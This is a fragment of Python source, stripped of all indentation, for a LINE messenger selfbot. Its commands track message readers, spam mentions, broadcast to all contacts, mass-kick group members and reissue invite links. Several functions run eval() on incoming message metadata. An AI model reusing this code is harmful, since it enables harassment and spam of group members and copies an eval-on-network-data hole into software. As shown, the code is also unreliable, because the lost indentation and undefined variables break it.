headers = {'content-type': 'application/json'}
r = requests.post(req_url, data=json.dumps(payload), headers=headers)
resp = json.loads(r.text)
return resp['id'].replace("https://","")
def kaskusget(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
kaskus = Kaskus()
if msg.text.lower().startswith('kaskus ht'):
h = kaskus.getHotThreads()
if len(msg.text.split(' ')) == 2:
d = ' 「 Kaskus Hot Thread 」'
no = 0
for c in h.data:
no+=1
d+= '\n{}. {}'.format(no,c.title)
self.sendMessage(msg.to,d)
if len(msg.text.split(' ')) == 3:
d = h.data[int(msg.text.split(' ')[2])-1]
r = requests.get(d.short_url)
s = BeautifulSoup(r.text,'html5lib')
sd = s.find_all('span',{'data-attr':'size'})
tt = ''
for a in sd:
if a == sd[0]:tt+= ''+a.text
else:tt+= '\n\n'+a.text
self.sendMessage(msg.to,'{}....'.format(tt[:2996].strip()), self.templatefoot(str(d.short_url),'https://lh3.googleusercontent.com/MJjKnEPXaCF9FCEILJGvShuPnrw1yMt1yAZgBMiD7J3EvmXvmzFYatAsXlvSWhstNw',str(d.title)))
try:self.sendImageWithURL(msg.to,d.image,'Kaskus')
except:pass
def lurkoff(self,to,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
targets = key["MENTIONEES"][0]["M"]
if targets not in wait['readPoints']:
self.sendMention(to, " 「 Lurk 」\nLurk in @! already mute",'',[targets])
else:
try:
del wait['readPoints'][targets];wait['lurkt'][to] = {};wait['lurkp'][to] = {}
except:
pass
self.sendMention(to, " 「 Lurk 」\nLurk in @! set to mute",'',[targets])
else:
if msg.text.lower() == "lurk off":
if msg.to not in wait['readPoint']:
self.sendMessage(to, " 「 Lurk 」\nLurk already off")
else:
try:
del wait['readPoint'][to];wait['setTime'][to] = {};wait['ROM1'][to] = {}
except:
pass
self.sendMessage(to, " 「 Lurk 」\nLurk point off")
def lurkon(self,to,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
targets = key["MENTIONEES"][0]["M"]
if targets in wait['readPoints']:
self.sendMention(to, " 「 Lurk 」\nLurk in @! already active",'',[targets])
else:
try:
del wait['readPoints'][targets];del wait['lurkt'][to];del wait['lurkp'][to][targets]
except:
pass
wait['readPoints'][targets] = msg.id
if to not in wait['lurkt']:
wait['lurkt'][to] = {}
wait['lurkp'][to] = {}
if targets not in wait['lurkp'][to]:
wait['lurkp'][to][targets] = {}
wait['lurkt'][to][targets] = {}
self.sendMention(to, " 「 Lurk 」\nLurk in @! set to active",'',[targets])
else:
if msg.text.lower() == "lurk on":
if to in wait['readPoint']:
self.sendMessage(to, " 「 Lurk 」\nLurk already set")
else:
try:
del wait['readPoint'][to];del wait['setTime'][to]
except:
pass
wait['readPoint'][to] = msg.id;wait['setTime'][to] = {};wait['ROM1'][to] = {}
self.sendMessage(to, " 「 Lurk 」\nLurk point set♪")
def lurkauto(self,to,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == "lurk auto off":
if wait['lurkauto'] == False:
self.sendMessage(to, " 「 Lurk 」\nLurk auto already off")
else:
wait['lurkauto'] = False
self.sendMessage(to, " 「 Lurk 」\nLurk auto point off")
if msg.text.lower() == "lurk auto on":
if to in wait['readPoint']:
if wait['lurkauto'] == True:self.sendMessage(to, " 「 Lurk 」\nLurk already set")
else:
try:
del wait['readPoint'][to];del wait['setTime'][to]
except:
pass
wait['readPoint'][to] = msg.id;wait['setTime'][to] = {};wait['ROM1'][to] = {}
wait['lurkauto'] = True
self.sendMessage(to, " 「 Lurk 」\nLurk point set")
def cekmention(self,to,wait):
if to in wait['ROM']:
moneys = {}
msgas = ''
for a in wait['ROM'][to].items():
moneys[a[0]] = [a[1]['msg.id'],a[1]['waktu']] if a[1] is not None else idnya
sort = sorted(moneys)
sort.reverse()
sort = sort[0:]
msgas = ' 「 Mention Me 」'
h = []
no = 0
for m in sort:
has = ''
nol = -1
for kucing in moneys[m][0]:
nol+=1
has+= '\nline://nv/chatMsg?chatId={}&messageId={} {}\nKetik resetmentionme untuk mereset data cekmention!'.format(to,kucing,humanize.naturaltime(datetime.fromtimestamp(moneys[m][1][nol]/1000)))
h.append(m)
no+=1
if m == sort[0]:
msgas+= '\n{}. @!{}x{}'.format(no,len(moneys[m][0]),has)
else:
msgas+= '\n\n{}. @!{}x{}'.format(no,len(moneys[m][0]),has)
self.sendMention(to, msgas,'', h)
del wait['ROM'][to]
else:
try:
msgas = 'Ups @!Tidak ada data mention di {}'.format(self.getGroup(to).name)
self.sendMention(to, msgas,' 「 Mention Me 」\n', [self.getProfile().mid])
except:
msgas = 'Ups @!Tidak ada data mention di {}'
self.sendMention(to, msgas,' 「 Mention Me 」\n', [self.getProfile().mid,to])
def adityasuperdata(self,msg,wait,text='',text1='',data=[]):
to = msg.to
key = wait["setkey"].title()
if data == []:return self.sendMessage(to, "╭───「 {} 」─\n│{}: None\n│ | Command | \n│Add {}\n│ Key:{} add{} [@|on]\n│Del {}\n│ Key:{} del{} [@|on|>|<|num 1]\n╰──────".format(text,text,text,key,text1,text,key,text1,key,text1))
self.datamention(msg,'{}'.format(text),data)
def lurkr(self,to,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
targets = key["MENTIONEES"][0]["M"]
if targets in wait['readPoints']:
chiya = []
for rom in wait["lurkp"][to][targets].items():
chiya.append(rom[1])
k = len(chiya)//100
for a in range(k+1):
if a == 0:self.mentionmention(to=to,wait=wait,text='',dataMid=chiya[:100],pl=0,ps='╭「 Lurkers 」─',pg='SIDERMES',pt=chiya)
else:self.mentionmention(to=to,wait=wait,text='',dataMid=chiya[a*100 : (a+1)*100],pl=a*100,ps='├「 Lurkers 」─',pg='SIDERMES',pt=chiya)
wait['lurkt'][to][targets] = {};wait['lurkp'][to][targets] = {}
else:self.sendMention(to, " 「 Lurk 」\nLurk in @! not active",'',[targets])
else:
if msg.text.lower() == "lurk result":
if to in wait['readPoint']:
try:
self.anulurk(to,wait)
wait['setTime'][to] = {}
except:self.sendMessage(to,' 「 Lurkers 」─\n╰ None')
else:self.sendMessage(to, " 「 Lurk 」\nLurk point not on♪")
def anulurk(self,to,wait):
moneys = {}
for a in wait["setTime"][to].items():
moneys[a[1]] = [a[0]] if a[1] is not None else idnya
sort = sorted(moneys)
sort = sort[0:]
k = len(sort)//100
for a in range(k+1):
if a == 0:no= a;msgas = ' 「 Lurkers 」'
else:no = a*100;msgas = ' 「 Lurkers 」'
h = []
for i in sort[a*100 : (a+1)*100]:
h.append(moneys[i][0])
no+=1
a = '{}'.format(humanize.naturaltime(datetime.fromtimestamp(i/1000)))
if no == len(sort):msgas+='\n{}. @!\n 「 {} 」'.format(no,a)
else:msgas+='\n{}. @!\n 「 {} 」'.format(no,a)
self.sendMention(to, msgas,'', h)
def autoaddmsgset(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split("\n")) >= 2:
wait["autoaddpesan"] = msg.text.replace(msg.text.split("\n")[0]+"\n","").replace('|','@!')
self.sendMessage(msg.to,"Pesan Auto add diterapkan menjadi :\n" + wait["autoaddpesan"])
def autoaddoff(self,wait):
if wait['autoAdd'] == False:
msgs="Auto Add already [Off]"
else:
msgs="AutoAdd set to [Off]"
wait['autoAdd']=False
return msgs
def autoaddon(self,wait):
if wait['autoAdd'] == True:
msgs="Auto Add already [On]."
else:
msgs="Auto Add set to [On]."
wait['autoAdd']=True
return msgs
def autoresponoff(self,wait,msg):
if msg.to not in wait["GROUP"]['AR']['AP']:
msgs="Auto Respon already [Off]"
else:
msgs="Auto Respon set to [Off]"
wait["GROUP"]['AR']['AP'].remove(msg.to)
return msgs
def autoresponmsgclear(self,wait,msg):
autorespon = wait["GROUP"]['AR']['P'][msg.to]
msgs="Auto Respon [Off]\nMessage backup:"
msgs+="\n" + autorespon
wait["GROUP"]['AR']['P'][msg.to] = ""
return msgs
def autoresponon(self,wait,msg):
if msg.to in wait["GROUP"]['AR']['AP']:
msgs="Auto Respon already [On]"
else:
msgs="Auto Respon set to [On]"
wait["GROUP"]['AR']['AP'].append(msg.to)
return msgs
def autoresponmsgset(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split("\n")) >= 2:
wait["GROUP"]['AR']['P'][msg.to] = msg.text.replace(msg.text.split("\n")[0]+"\n","")
self.sendMessage(msg.to,"Pesan Auto Respon diterapkan menjadi :\n" + wait["GROUP"]['AR']['P'][msg.to])
def autorespon(self,wait,msg):
if msg.to in wait["GROUP"]['AR']['AP']:
msgs="Auto Respon: [On]"
if msg.to in wait["GROUP"]['AR']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['AR']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['AR']['P']:
if wait["GROUP"]['AR']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['AR']['P'][msg.to] + "\n"
else:msgs+=''
else:
msgs="Auto Respon: [Off]"
if msg.to in wait["GROUP"]['AR']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['AR']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['AR']['P']:
if wait["GROUP"]['AR']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['AR']['P'][msg.to] + "\n"
else:msgs+=''
return msgs+"\n- AutoRespon Set\n Usage:"+wait["setkey"].title()+" autorespon [on|off]\n- AutoRespon Sticker\n Usage:"+wait["setkey"].title()+" add stickerauto respon\n- autorespon msg setting\n Usage:"+wait["setkey"].title()+" autorespon msg set <text>\n OR:"+wait["setkey"].title()+" autorespon msg set <text|text>"
def autoaddmsgclear(self,wait):
autoadd = wait["autoaddpesan"]
msgs="Pesan Auto add [Off]\nMessage backup:"
msgs+="\n" + autoadd
wait["autoaddpesan"] = ""
return msgs
def fancynameon(self,msg,wait,sdg):
msg.text = self.mycmd(msg.text,wait)
wait['talkban'] = {'time':time.time(),'timer':int(self.adityasplittext(msg.text.lower(),'s')),'cvp':False,'video':'','pict':''}
if 'name' not in wait['talkban']:wait['talkban']['name'] = sdg
if wait['ChangeCover'] == True:
msgs="Fancy Name already [On] With Timer {}secs".format(wait['talkban']['timer'])
else:
msgs="Fancy Name set to [On] With Timer {}secs".format(wait['talkban']['timer'])
wait['ChangeCover']=True
return msgs
def fancynameoff(self,wait):
if wait['ChangeCover'] == False:
msgs="Fancy Name already [Off]"
else:
msgs="Fancy Name set to [Off]"
wait['ChangeCover']=False
wait['talkban'] = {'time':time.time(),'timer':wait['talkban']['timer'],'cvp':False,'video':'','pict':'','name':wait['talkban']['name']}
self.updateProfileAttribute(2, wait['talkban']['name'])
return msgs
def autoadd(self,wait):
if wait['autoAdd'] == True:
if wait["autoaddpesan"] == '':
msgs="Add Back: [On]\nAdd Message: [Off]\n\n\n"
else:
msgs="Add Back: [On]\nAdd Message: [On]"
msgs+="\n" + wait['autoaddpesan'] + "\n\n"
else:
if wait["autoaddpesan"] == '':
msgs=" 「 Auto Add 」\nAdd Back: [Off]\nAdd Message: False♪\n\n\n"
else:
msgs=" 「 Auto Add 」\nAdd Back: [Off]\nAdd Message: [On]"
msgs+="\n" + wait['autoaddpesan'] + "\n"
return msgs+"\n |Command|\n- Autoadd friend\n Usage:"+wait["setkey"].title()+" autoadd [on|off]\n- Autoadd msg setting\n Usage:"+wait["setkey"].title()+" autoadd msg set <text>\n OR:"+wait["setkey"].title()+" autoadd msg set <text|text>"
def anugrupinvitti(self,op,wait,waita,sdd):
if self.getProfile().mid in op.param3 and waita["name"][sdd]["pay"] >= time.time():
G = self.getCompactGroup(op.param1)
if wait["autoJoin"] == True:
if len(G.members) <= wait["Members"]:
self.rejectGroupInvitation(op.param1)
else:
self.acceptGroupInvitation(op.param1)
if len(G.members) <= wait["Members"]:
self.rejectGroupInvitation(op.param1)
else:
if op.param1 in wait['kitsuneshare']:
group = self.getCompactGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
if _mid in op.param3:
self.cancelGroupInvitation(op.param1,[_mid])
else:pass
def waktunjir(self):
sd = ''
if datetime.now().hour > 1 and datetime.now().hour <10:sd+= 'Good Morning'
if datetime.now().hour > 10 and datetime.now().hour <15:sd+= 'Good Afternoon'
if datetime.now().hour > 15 and datetime.now().hour <18:sd+= 'Good Evening'
if datetime.now().hour >= 18:sd+= 'Good Night'
return sd
def anuaccgroup(self,op,wait,waita,sdd):
if op.param1 in wait["GROUP"]['WM']['AP'] and waita["name"][sdd]["pay"] >= time.time():
if op.param1 in wait["GROUP"]['WM']['S']:
self.sendMessage(op.param1,text=None,contentMetadata=wait["GROUP"]['WM']['S'][op.param1]['Sticker'], contentType=7)
if(wait["GROUP"]['WM']['P'][op.param1] in [""," ","\n",None]):
return
if '@!' not in wait["GROUP"]['WM']['P'][op.param1]:
wait["GROUP"]['WM']['P'][op.param1] = '@!'+wait["GROUP"]['WM']['P'][op.param1]
nama = self.getGroup(op.param1).name
sd = self.waktunjir()
self.sendMention(op.param1,wait["GROUP"]['WM']['P'][op.param1].replace('greeting',sd).replace('Greeting',sd).replace(';',nama),' ',[op.param2]*wait["GROUP"]['WM']['P'][op.param1].count('@!'))
def anualeavegroup(self,op,wait,waita,sdd):
if op.param1 in wait["GROUP"]['LM']['AP'] and waita["name"][sdd]["pay"] >= time.time():
if op.param1 in wait["GROUP"]['LM']['S']:
self.sendMessage(op.param2,text=None,contentMetadata=wait["GROUP"]['LM']['S'][op.param1]['Sticker'], contentType=7)
self.sendMention(op.param2, "{}".format(wait["GROUP"]['LM']['P'][op.param1].replace('|',' @!')),' ',[op.param2])
def sendstickers(self,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split(" ")) >= 2:
self.sendall(msg.to,self.adityasplittext(msg.text,'s'))
def setbroadcast(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith('broadcast 3'):
if len(msg.text.split("\n")) >= 2:
a = self.getGroupIdsJoined()
for i in a:
G = self.getGroup(i)
if len(G.members) > wait["Members"]:
self.sendMessage(i,msg.text.replace(msg.text.split("\n")[0]+"\n",""))
if msg.text.lower().startswith('broadcast 2'):
if len(msg.text.split("\n")) >= 2:
a = self.getAllContactIds()
for i in a:
self.sendMessage(i,msg.text.replace(msg.text.split("\n")[0]+"\n",""))
if msg.text.lower().startswith('broadcast 1'):
if len(msg.text.split("\n")) >= 2:
a = self.getGroupIdsJoined()
for i in a:
G = self.getGroup(i)
if len(G.members) > wait["Members"]:
self.sendMessage(i,msg.text.replace(msg.text.split("\n")[0]+"\n",""))
a = self.getAllContactIds()
for i in a:
self.sendMessage(i,msg.text.replace(msg.text.split("\n")[0]+"\n",""))
def setname(self,to,msg,wait):
msg.text = self.mycmd(msg.text,wait)
profile = self.getProfile()
if len(msg.text.split(" ")) <= 2 or len(msg.text.split("\n")) <= 1:self.sendMessage(to,profile.displayName)
if len(msg.text.split("\n")) >= 2:
profiles = self.getProfile()
profile = self.getProfile()
profile.displayName = msg.text.replace(msg.text.split("\n")[0]+"\n","")
wait['talkban']['name'] = profile.displayName
self.updateProfileAttribute(2, profile.displayName)
self.sendMessage(to,"Sukses mengubah nama."+profile.displayName+"\nmenjadi "+profile.displayName)
def setfancy(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
wait['timeline'] = []
wait['timeline'] = msg.text.split("\n")[1:]
d = 'Fancy Name Set to:'
for a in wait['timeline']:
d+= '\n{}'.format(a)
self.sendMessage(msg.to,'{}'.format(d))
def setbio(self,to,msg,wait):
msg.text = self.mycmd(msg.text,wait)
profile = self.getProfile()
if len(msg.text.split(" ")) <= 2 or len(msg.text.split("\n")) <= 1:self.sendMessage(to,profile.statusMessage)
if len(msg.text.split("\n")) >= 2:
profile.statusMessage = msg.text.replace(msg.text.split("\n")[0]+"\n","")
self.updateProfileAttribute(16, profile.statusMessage)
self.sendMessage(to,"Sukses mengubah bio." + profile.statusMessage+" ")
def adityaarchi(self,wait,sd,dd,ss,split,msg,tex,nama=[]):
selection = AdityaSplitGood(split,range(1,len(nama)+1))
k = len(nama)//100
for a in range(k+1):
if a == 0:eto='╭「 '+sd+' 」─'+tex
else:eto='├「 '+sd+' 」─'+tex
text = ''
mids = []
no = a
for i in selection.parse()[a*100 : (a+1)*100]:
mids.append(nama[i-1])
if dd == 'kick':self.kickoutFromGroup(ss,[nama[i-1]]);hh = ''
if dd == 'delfriend':
try:self.AdityadeleteContact(nama[i-1]);hh = 'Del Friend'
except:hh = 'Not Friend User'
if dd == 'delbl':
try:wait['blacklist'].remove(nama[i-1]);hh = 'Del BL'
except:hh = 'Not BL User'
if dd == 'delwl':
try:wait['bots'].remove(nama[i-1]);hh = 'Del WL'
except:hh = 'Not WL User'
if dd == 'delml':
try:wait['target'].remove(nama[i-1]);hh = 'Del ML'
except:hh = 'Not ML User'
if dd == 'delblock':
try:self.unblockContact(nama[i-1]);hh = 'Del Block'
except:hh = 'Not Block User'
if dd == '':hh = ''
if dd == 'tag':hh = ''
no+= 1
if no == len(selection.parse()):text+= "\n╰{}. @! {}".format(i,hh)
else:text+= "\n│{}. @! {}".format(i,hh)
if dd == 'tag':self.sendMention(ss,eto+text,sd,mids)
else:self.sendMention(msg.to,eto+text,sd,mids)
if dd == 'tag':self.sendMessage(msg.to,'╭「 Mention 」{}\n╰Status: Success tag {} mem'.format(tex,len(nama)-(len(nama)-len(selection.parse()))))
def delgroups(self,to,dits):
gid = self.getGroupIdsJoined()
if len(dits.split(" ")) == 3:
selection = AdityaSplitGood(dits.split(' ')[2],range(1,len(gid)+1))
k = len(gid)//100
for a in range(k+1):
if a == 0:eto='╭「 Leave Group 」─'
else:eto='├「 Leave Group 」─'
text = ''
no = 0
for i in selection.parse()[a*100 : (a+1)*100]:
self.leaveGroup(gid[i - 1])
no+=1
if no == len(selection.parse()):text+= "\n╰{}. {}".format(i,self.getGroup(gid[i - 1]).name)
else:text+= "\n│{}. {}".format(i,self.getGroup(gid[i - 1]).name)
self.sendMessage(to,eto+text)
def openqr(self,to,dits):
gid = self.getGroupIdsJoined()
if len(dits.split(" ")) == 3:
selection = AdityaSplitGood(dits.split(' ')[2],range(1,len(gid)+1))
k = len(gid)//100
for a in range(k+1):
if a == 0:eto='╭「 QR Group 」─'
else:eto='├「 QR Group 」─'
text = ''
no = 0
for i in selection.parse()[a*100 : (a+1)*100]:
group = self.getGroup(gid[i - 1])
if group.preventedJoinByTicket == True:
group.preventedJoinByTicket = False
self.updateGroup(group)
no+=1
if no == len(selection.parse()):text+= "\n│{}. {}\n╰ line://ti/g/{}".format(i,self.getGroup(gid[i - 1]).name,self.reissueGroupTicket(gid[i - 1]))
else:text+= "\n│{}. {}\n│ line://ti/g/{}".format(i,self.getGroup(gid[i - 1]).name,self.reissueGroupTicket(gid[i - 1]))
self.sendMessage(to,eto+text)
def lsgroup(self,msg,wait,dits):
to = msg.to
gid = self.getGroupIdsJoined()
group = self.getGroup(gid[int(dits.split(' ')[1])-1])
nama = [a.mid for a in group.members]
if len(dits.split(" ")) == 2:
total = "Local ID: {}".format(int(dits.split(' ')[1]))
self.datamention(msg,'List Member',nama,'\n├Group: '+group.name[:20]+'\n├'+total)
if len(dits.split(" ")) == 4:
if dits.startswith('grouplist '+dits.split(' ')[1]+' mem '):self.getinformation(to,nama[int(dits.split(' ')[3])-1],wait)
if dits.startswith('grouplist '+dits.split(' ')[1]+' tag'):self.adityaarchi(wait,'Mention','tag',gid[int(dits.split(' ')[1])-1],dits.split(' ')[3],msg,"\n├Group: {}\n├Local ID: {}".format(group.name[:20],int(dits.split(' ')[1])),nama=nama)
if dits.startswith('grouplist '+dits.split(' ')[1]+' kick'):self.adityaarchi(wait,'Kick Member','kick',gid[int(dits.split(' ')[1])-1],dits.split(' ')[3],msg,"\n├Group: {}\n├Local ID: {}".format(group.name[:20],int(dits.split(' ')[1])),nama=nama)
def mentionbynum(self,to,wait,msg,cmd):
if 'MENTION' in msg.contentMetadata.keys()!=None:self.datamention(msg,'Spam',[eval(msg.contentMetadata["MENTION"])["MENTIONEES"][0]["M"]]*int(cmd.split(" ")[1]))
else:
msg.text = self.mycmd(msg.text,wait)
if msg.toType == 2:
if msg.text.lower().startswith('mention '):
group = self.getGroup(to)
nama = [contact.mid for contact in group.members]
try:self.adityaarchi(wait,'Mention','',to,self.adityasplittext(msg.text),msg,'\n├Group: '+group.name[:20],nama=nama)
except:self.datamention(msg,'Mention',[])
if msg.text.lower().startswith('mentionsort '):
texst = self.adityasplittext(cmd)
gs = self.getGroup(to)
c = ['{}:-:{}'.format(a.displayName,a.mid) for a in gs.members]
c.sort()
b = []
for s in c:
if len(texst) == 1:dd = s[len(texst)-1].lower()
else:dd = s[:len(texst)].lower()
if texst in dd:b.append(s.split(':-:')[1])
self.datamention(msg,'Mentioning',b)
if msg.text.lower().startswith('mentionname '):
texst = self.adityasplittext(cmd)
gs = self.getGroup(to)
c = ['{}:-:{}'.format(a.displayName,a.mid) for a in gs.members]
c.sort()
b = []
for s in c:
if texst in s.split(':-:')[0].lower():b.append(s.split(':-:')[1])
self.datamention(msg,'Mentioning',b)
else:
self.datamention(msg,'Spam',[to]*int(cmd.split(" ")[1]))
def mentionall(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
try:group = self.getGroup(msg.to);nama = [contact.mid for contact in group.members];nama.remove(self.getProfile().mid)
except:group = self.getRoom(msg.to);nama = [contact.mid for contact in group.contacts]
if msg.text.lower() == "mentionall":
self.datamention(msg,'Mention',nama)
if msg.text.lower() == "mentionall -s":
self.unsendMessage(msg.id)
k = len(nama)//100
for a in range(k+1):
if msg.text.lower() == "mentionall":
self.datamention(msg,'Mention',nama)
else:
if a == 0:self.mentionmention(to=msg.to,wait=wait,text='',dataMid=nama[:100],pl=0,ps=' 「 Mentionall 」',pg='MENTIONALLUNSED',pt=nama)
else:self.mentionmention(to=msg.to,wait=wait,text='',dataMid=nama[a*100 : (a+1)*100],pl=a*100,ps=' ',pg='MENTIONALLUNSED',pt=nama)
@loggedIn
def giftmessage(self,to):
a = ("5","7","6","8")
b = random.choice(a)
return self.sendMessage(to, text=None, contentMetadata={'PRDTYPE': 'STICKER','STKVER': '1','MSGTPL': b,'STKPKGID': '1380280'}, contentType=9)
def getinformation(self,to,mid,data):
try:
if mid in data["bots"]:a = "Whitelisted: Yes\n"
else:a = "Whitelisted: No\n"
if mid in data["blacklist"]:b = "Blacklisted: Yes"
else:b = "Blacklisted: No"
h = self.getContact(mid).statusMessage
if h == '':hh = '\n'
else:hh = "Status:\n" + h + "\n\n"
zxc = " 「 INFO 」\nName: @!\n" + hh + "User ID:\n" + mid + "\n"+a+" "+b
self.sendMention(to, zxc, '',[mid])
self.sendContact(to,mid)
except:
ginfo = self.getCompactGroup(mid)
try:
gCreators = ginfo.creator.mid;gtime = ginfo.createdTime
except:
gCreators = ginfo.members[0].mid;gtime = ginfo.createdTime
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventedJoinByTicket == True:u = "Disable"
else:u = "line://ti/g/" + self.reissueGroupTicket(mid)
zxc = " 「 ID 」\nGroup Name:\n{}\n\nGroup ID:\n{}\n\nAnggota: {}\nInvitation: {}\nTicket:{}\n\nCreated at:\n{}\nby @!".format(ginfo.name,mid,len(ginfo.members),sinvitee,u,humanize.naturaltime(datetime.fromtimestamp(gtime/1000)))
self.sendMention(to,zxc,'',[gCreators])
self.sendContact(to,gCreators)
def sendall(self,to,text):
try:
r = requests.get("http://dl.stickershop.line.naver.jp/products/0/0/1/"+text+"/android/productInfo.meta")
data = r.json()
for a in data['stickers']:
b = str(a['id'])
self.sendMessage(to,text=None,contentMetadata={"STKID": str(a['id']),"STKPKGID": text,"STKTXT": "[Sticker]","STKVER": '1'}, contentType=7)
except Exception as e:
r = requests.get("http://dl.stickershop.line.naver.jp/products/0/0/1/"+text+"/android/productInfo.meta")
data = r.json()
for a in data['stickers']:
b = str(a['id'])
self.sendImageWithURL(to,'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+b+'/ANDROID/sticker.png')
def mentions(self,wait):a=wait["setkey"].title();return " 「 Mention 」\nMention By Number\n Command: "+a+"mention [1-5]\nMention By Name\n Command: "+a+"mentionsort [A-z]\n Command: "+a+"mentionname [A-z]\nSpam Mention\n Command: "+a+"mention [2|@]\nMentionall Member\n Command: "+a+"mentionall"
def keluarinmanteman(self,msg,wait,sas):
if msg.text.lower() == 'bye':
for a in sas:
a.leaveGroup(msg.to)
def manggilmanteman(self,msg,wait,sas):
if msg.text.lower() == 'adit~':
kitsune = msg.to
G = self.getGroup(kitsune)
ginfo = self.getGroup(kitsune)
G.preventedJoinByTicket = False
self.updateGroup(G)
invsend = 0
Ticket = self.reissueGroupTicket(kitsune)
for a in sas:
a.acceptGroupInvitationByTicket(kitsune,Ticket)
G = self.getGroup(kitsune)
ginfo = self.getGroup(kitsune)
G.preventedJoinByTicket = True
random.choice(sas).updateGroup(G)
def listsimpanan(self,text,data={}):
if data == {}:
msgs = " 「 {} List 」\nNo {}".format(text,text)
else:
no=0
msgs=" 「 {} List 」\n{} List:".format(text,text)
for a in data:
no+=1
if no % 2 == 0:msgs+=" %i. %s" % (no, a)
else:msgs+="\n%i. %s" % (no, a)
msgs+="\n\nTotal {} List: {}".format(text,len(data))
return msgs
def setsticker(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
separate = msg.text.lower().split(" ")
text = msg.text.lower().replace(separate[0]+" "+separate[1]+" ","")
wait["Sticker"][text] = '{}'.format(text)
wait["Img"] = '{}'.format(text)
wait["Addsticker"] = True
self.sendMessage(msg.to, " 「 Sticker 」\nSend the sticker")
def setstickerauto(self,wait,msg):
if msg.to not in wait["GROUP"]['AR']['S']:
wait["GROUP"]['AR']['S'][msg.to] = {'AP':False,'Sticker':{}}
wait["GROUP"]['AR']['S'][msg.to]['AP'] = True
self.sendMessage(msg.to, " 「 Sticker 」\nSend the sticker")
def welcomeon(self,wait,msg):
if msg.to in wait["GROUP"]['WM']['AP']:
msgs=" 「 Welcome Message 」\nWelcome Message already ENABLED♪"
else:
msgs=" 「 Welcome Message 」\nWelcome Message set to ENABLED♪"
wait["GROUP"]['WM']['AP'].append(msg.to)
return msgs
def welcomeoff(self,wait,msg):
if msg.to not in wait["GROUP"]['WM']['AP']:
msgs=" 「 Welcome Message 」\nWelcome Message already DISABLED♪"
else:
msgs=" 「 Welcome Message 」\nWelcome Message set to DISABLED♪"
wait["GROUP"]['WM']['AP'].remove(msg.to)
return msgs
def leaveoff(self,wait,msg):
if msg.to not in wait["GROUP"]['LM']['AP']:
msgs=" 「 Leave Message 」\nLeave Message already DISABLED♪"
else:
msgs=" 「 Leave Message 」\nLeave Message set to DISABLED♪"
wait["GROUP"]['LM']['AP'].remove(msg.to)
return msgs
def welcomemsgset(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split("\n")) >= 2:
wait["GROUP"]['WM']['P'][msg.to] = msg.text.replace(msg.text.split("\n")[0]+"\n","").replace('|',' @!')
self.sendMessage(msg.to," 「 Welcome Message 」\nWelcome Message has been set to:\n" + wait["GROUP"]['WM']['P'][msg.to])
def welcome(self,wait,msg):
if msg.to in wait["GROUP"]['WM']['AP']:
msgs=" 「 Welcome Message 」\nWelcome Message: ON♪"
if msg.to in wait["GROUP"]['WM']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['WM']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['WM']['P']:
if wait["GROUP"]['WM']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['WM']['P'][msg.to] + "\n"
else:msgs+=''
else:
msgs=" 「 Welcome Message 」\nWelcome Message: OFF"
if msg.to in wait["GROUP"]['WM']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['WM']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['WM']['P']:
if wait["GROUP"]['WM']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['WM']['P'][msg.to] + "\n"
else:msgs+=''
return msgs+"\n |Command|\n- Welcome Set\n Usage:"+wait["setkey"].title()+" welcome [on|off]\n- Welcome Sticker\n Usage:"+wait["setkey"].title()+" add welcome sticker\n- Welcome msg setting\n Usage:"+wait["setkey"].title()+" welcome msg set <text>\n OR:"+wait["setkey"].title()+" welcome msg set <text|text>"
def setstickerwelcome(self,wait,msg):
if msg.to not in wait["GROUP"]['WM']['S']:
wait["GROUP"]['WM']['S'][msg.to] = {'AP':False,'Sticker':{}}
wait["GROUP"]['WM']['S'][msg.to]['AP'] = True
self.sendMessage(msg.to, " 「 Sticker 」\nSend the sticker")
def leaveon(self,wait,msg):
if msg.to in wait["GROUP"]['LM']['AP']:
msgs=" 「 Leave Message 」\nLeave Message already ENABLED♪"
else:
msgs=" 「 Leave Message 」\nLeave Message set to ENABLED♪"
wait["GROUP"]['LM']['AP'].append(msg.to)
return msgs
def leavemsgset(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split("\n")) >= 2:
